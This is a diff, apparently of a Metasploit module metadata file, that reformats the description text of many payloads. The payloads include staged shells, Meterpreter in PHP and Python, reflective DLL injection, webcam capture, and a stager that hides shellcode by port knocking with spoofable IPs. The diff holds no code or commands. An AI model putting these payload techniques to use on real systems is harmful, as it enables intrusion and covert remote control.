+    "description": "Inject a Mach-O bundle to capture a photo from the iSight (staged).\n\nListen, read length, read buffer, execute",
    "references": [

    ],
@@ -194514,7 +195079,7 @@
    "author": [
      "ddz <ddz@theta44.org>"
    ],
-    "description": "Inject a Mach-O bundle to capture a photo from the iSight (staged). Connect, read length, read buffer, execute",
+    "description": "Inject a Mach-O bundle to capture a photo from the iSight (staged).\n\nConnect, read length, read buffer, execute",
    "references": [

    ],
@@ -194650,7 +195215,7 @@
    "author": [
      "ddz <ddz@theta44.org>"
    ],
-    "description": "Call vfork() if necessary and spawn a command shell (staged). Listen, read length, read buffer, execute",
+    "description": "Call vfork() if necessary and spawn a command shell (staged).\n\nListen, read length, read buffer, execute",
    "references": [

    ],
@@ -194684,7 +195249,7 @@
    "author": [
      "ddz <ddz@theta44.org>"
    ],
-    "description": "Call vfork() if necessary and spawn a command shell (staged). Connect, read length, read buffer, execute",
+    "description": "Call vfork() if necessary and spawn a command shell (staged).\n\nConnect, read length, read buffer, execute",
    "references": [

    ],
@@ -194994,7 +195559,7 @@
    "author": [
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Run a meterpreter server in PHP. Listen for a connection",
+    "description": "Run a meterpreter server in PHP.\n\nListen for a connection",
    "references": [

    ],
@@ -195028,7 +195593,7 @@
    "author": [
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Run a meterpreter server in PHP. Listen for a connection over IPv6",
+    "description": "Run a meterpreter server in PHP.\n\nListen for a connection over IPv6",
    "references": [

    ],
@@ -195063,7 +195628,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Run a meterpreter server in PHP. Listen for a connection over IPv6 with UUID Support",
+    "description": "Run a meterpreter server in PHP.\n\nListen for a connection over IPv6 with UUID Support",
    "references": [

    ],
@@ -195098,7 +195663,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Run a meterpreter server in PHP. Listen for a connection with UUID Support",
+    "description": "Run a meterpreter server in PHP.\n\nListen for a connection with UUID Support",
    "references": [

    ],
@@ -195132,7 +195697,7 @@
    "author": [
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions",
+    "description": "Run a meterpreter server in PHP.\n\nReverse PHP connect back stager with checks for disabled functions",
    "references": [

    ],
@@ -195167,7 +195732,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions",
+    "description": "Run a meterpreter server in PHP.\n\nReverse PHP connect back stager with checks for disabled functions",
    "references": [

    ],
@@ -195337,7 +195902,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection",
+    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection",
    "references": [

    ],
@@ -195372,7 +195937,7 @@
      "Spencer McIntyre",
      "OJ Reeves"
    ],
-    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection with UUID Support",
+    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection with UUID Support",
    "references": [

    ],
@@ -195406,7 +195971,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP",
+    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP",
    "references": [

    ],
@@ -195440,7 +196005,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP using SSL",
+    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP using SSL",
    "references": [

    ],
@@ -195474,7 +196039,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker",
+    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -195510,7 +196075,7 @@
      "Ben Campbell <eat_meatballs@hotmail.co.uk>",
      "RageLtMan"
    ],
-    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Reverse Python connect back stager using SSL",
+    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nReverse Python connect back stager using SSL",
    "references": [

    ],
@@ -195545,7 +196110,7 @@
      "Spencer McIntyre",
      "OJ Reeves"
    ],
-    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker with UUID Support",
+    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -196473,7 +197038,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Custom shellcode stage. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Custom shellcode stage.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [

    ],
@@ -196511,7 +197076,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Custom shellcode stage. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Custom shellcode stage.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [

    ],
@@ -196548,7 +197113,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Custom shellcode stage. Listen for an IPv6 connection (Windows x86)",
+    "description": "Custom shellcode stage.\n\nListen for an IPv6 connection (Windows x86)",
    "references": [

    ],
@@ -196586,7 +197151,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Custom shellcode stage. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Custom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -196621,7 +197186,7 @@
      "bwatters-r7",
      "UserExistsError"
    ],
-    "description": "Custom shellcode stage. Listen for a pipe connection (Windows x86)",
+    "description": "Custom shellcode stage.\n\nListen for a pipe connection (Windows x86)",
    "references": [

    ],
@@ -196656,7 +197221,7 @@
      "bwatters-r7",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Custom shellcode stage. Listen for a connection (No NX)",
+    "description": "Custom shellcode stage.\n\nListen for a connection (No NX)",
    "references": [

    ],
@@ -196693,7 +197258,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Custom shellcode stage. Listen for a connection (Windows x86)",
+    "description": "Custom shellcode stage.\n\nListen for a connection (Windows x86)",
    "references": [

    ],
@@ -196732,7 +197297,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Custom shellcode stage. Listen for a connection",
+    "description": "Custom shellcode stage.\n\nListen for a connection",
    "references": [

    ],
@@ -196768,7 +197333,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Custom shellcode stage. Listen for a connection with UUID Support (Windows x86)",
+    "description": "Custom shellcode stage.\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -196803,7 +197368,7 @@
      "bwatters-r7",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Custom shellcode stage. Use an established connection",
+    "description": "Custom shellcode stage.\n\nUse an established connection",
    "references": [

    ],
@@ -196840,7 +197405,7 @@
      "bannedit <bannedit@metasploit.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Custom shellcode stage. \n        Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n        data/hop/hop.php to the PHP server you wish to use as a hop.",
+    "description": "Custom shellcode stage.\n\nTunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\ndata/hop/hop.php to the PHP server you wish to use as a hop.",
    "references": [

    ],
@@ -196875,7 +197440,7 @@
      "bwatters-r7",
      "hdm <x@hdm.io>"
    ],
-    "description": "Custom shellcode stage. Tunnel communication over HTTP (Windows wininet)",
+    "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows wininet)",
    "references": [

    ],
@@ -196910,7 +197475,7 @@
      "bwatters-r7",
      "hdm <x@hdm.io>"
    ],
-    "description": "Custom shellcode stage. Tunnel communication over HTTP",
+    "description": "Custom shellcode stage.\n\nTunnel communication over HTTP",
    "references": [

    ],
@@ -196945,7 +197510,7 @@
      "bwatters-r7",
      "hdm <x@hdm.io>"
    ],
-    "description": "Custom shellcode stage. Tunnel communication over HTTPS (Windows wininet)",
+    "description": "Custom shellcode stage.\n\nTunnel communication over HTTPS (Windows wininet)",
    "references": [

    ],
@@ -196982,7 +197547,7 @@
      "corelanc0d3r <peter.ve@corelan.be>",
      "amaloteaux <alex_maloteaux@metasploit.com>"
    ],
-    "description": "Custom shellcode stage. Tunnel communication over HTTP using SSL with custom proxy support",
+    "description": "Custom shellcode stage.\n\nTunnel communication over HTTP using SSL with custom proxy support",
    "references": [

    ],
@@ -197019,7 +197584,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker over IPv6",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -197054,7 +197619,7 @@
      "bwatters-r7",
      "OJ Reeves"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker via a named pipe pivot",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [

    ],
@@ -197089,7 +197654,7 @@
      "bwatters-r7",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker (No NX)",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker (No NX)",
    "references": [

    ],
@@ -197124,7 +197689,7 @@
      "bwatters-r7",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -197161,7 +197726,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -197198,7 +197763,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Custom shellcode stage. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Custom shellcode stage.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [

    ],
@@ -197236,7 +197801,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "RageLtMan"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -197275,7 +197840,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -197314,7 +197879,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -197350,7 +197915,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker with UUID Support",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -197385,7 +197950,7 @@
      "bwatters-r7",
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker with UUID Support",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -197421,7 +197986,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Custom shellcode stage. Tunnel communication over HTTP (Windows winhttp)",
+    "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows winhttp)",
    "references": [

    ],
@@ -197457,7 +198022,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Custom shellcode stage. Tunnel communication over HTTPS (Windows winhttp)",
+    "description": "Custom shellcode stage.\n\nTunnel communication over HTTPS (Windows winhttp)",
    "references": [

    ],
@@ -197494,7 +198059,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject a DLL via a reflective loader. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Inject a DLL via a reflective loader.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -197532,7 +198097,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Inject a DLL via a reflective loader.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -197569,7 +198134,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a DLL via a reflective loader. Listen for an IPv6 connection (Windows x86)",
+    "description": "Inject a DLL via a reflective loader.\n\nListen for an IPv6 connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -197607,7 +198172,7 @@
      "skape <mmiller@hick.org>",
      "OJ Reeves"
    ],
-    "description": "Inject a DLL via a reflective loader. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Inject a DLL via a reflective loader.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -197643,7 +198208,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "UserExistsError"
    ],
-    "description": "Inject a DLL via a reflective loader. Listen for a pipe connection (Windows x86)",
+    "description": "Inject a DLL via a reflective loader.\n\nListen for a pipe connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -197679,7 +198244,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Inject a DLL via a reflective loader. Listen for a connection (No NX)",
+    "description": "Inject a DLL via a reflective loader.\n\nListen for a connection (No NX)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -197716,7 +198281,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a DLL via a reflective loader. Listen for a connection (Windows x86)",
+    "description": "Inject a DLL via a reflective loader.\n\nListen for a connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -197755,7 +198320,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject a DLL via a reflective loader. Listen for a connection",
+    "description": "Inject a DLL via a reflective loader.\n\nListen for a connection",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -197792,7 +198357,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Inject a DLL via a reflective loader. Listen for a connection with UUID Support (Windows x86)",
+    "description": "Inject a DLL via a reflective loader.\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -197828,7 +198393,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a DLL via a reflective loader. Use an established connection",
+    "description": "Inject a DLL via a reflective loader.\n\nUse an established connection",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -197866,7 +198431,7 @@
      "bannedit <bannedit@metasploit.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject a DLL via a reflective loader. \n        Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n        data/hop/hop.php to the PHP server you wish to use as a hop.",
+    "description": "Inject a DLL via a reflective loader.\n\nTunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\ndata/hop/hop.php to the PHP server you wish to use as a hop.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -197902,7 +198467,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows wininet)",
+    "description": "Inject a DLL via a reflective loader.\n\nTunnel communication over HTTP (Windows wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -197938,7 +198503,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject a DLL via a reflective loader. Tunnel communication over HTTP",
+    "description": "Inject a DLL via a reflective loader.\n\nTunnel communication over HTTP",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -197975,7 +198540,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a DLL via a reflective loader. Connect back to the attacker over IPv6",
+    "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker over IPv6",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198011,7 +198576,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Inject a DLL via a reflective loader. Connect back to the attacker (No NX)",
+    "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker (No NX)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198047,7 +198612,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Inject a DLL via a reflective loader. Connect back to the attacker",
+    "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198084,7 +198649,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a DLL via a reflective loader. Connect back to the attacker",
+    "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198121,7 +198686,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a DLL via a reflective loader. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Inject a DLL via a reflective loader.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198159,7 +198724,7 @@
      "skape <mmiller@hick.org>",
      "RageLtMan"
    ],
-    "description": "Inject a DLL via a reflective loader. Connect back to the attacker",
+    "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198198,7 +198763,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject a DLL via a reflective loader. Connect back to the attacker",
+    "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198237,7 +198802,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject a DLL via a reflective loader. Connect back to the attacker",
+    "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198274,7 +198839,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Inject a DLL via a reflective loader. Connect back to the attacker with UUID Support",
+    "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker with UUID Support",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198311,7 +198876,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows winhttp)",
+    "description": "Inject a DLL via a reflective loader.\n\nTunnel communication over HTTP (Windows winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198562,7 +199127,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198601,7 +199166,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198639,7 +199204,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection (Windows x86)",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for an IPv6 connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198677,7 +199242,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198715,7 +199280,7 @@
      "OJ Reeves",
      "UserExistsError"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a pipe connection (Windows x86)",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a pipe connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198753,7 +199318,7 @@
      "OJ Reeves",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection (No NX)",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection (No NX)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198791,7 +199356,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection (Windows x86)",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198831,7 +199396,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198869,7 +199434,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection with UUID Support (Windows x86)",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198906,7 +199471,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Use an established connection",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nUse an established connection",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198946,7 +199511,7 @@
      "bannedit <bannedit@metasploit.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. \n        Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n        data/hop/hop.php to the PHP server you wish to use as a hop.",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\ndata/hop/hop.php to the PHP server you wish to use as a hop.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198984,7 +199549,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows wininet)",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows wininet)",
    "references": [
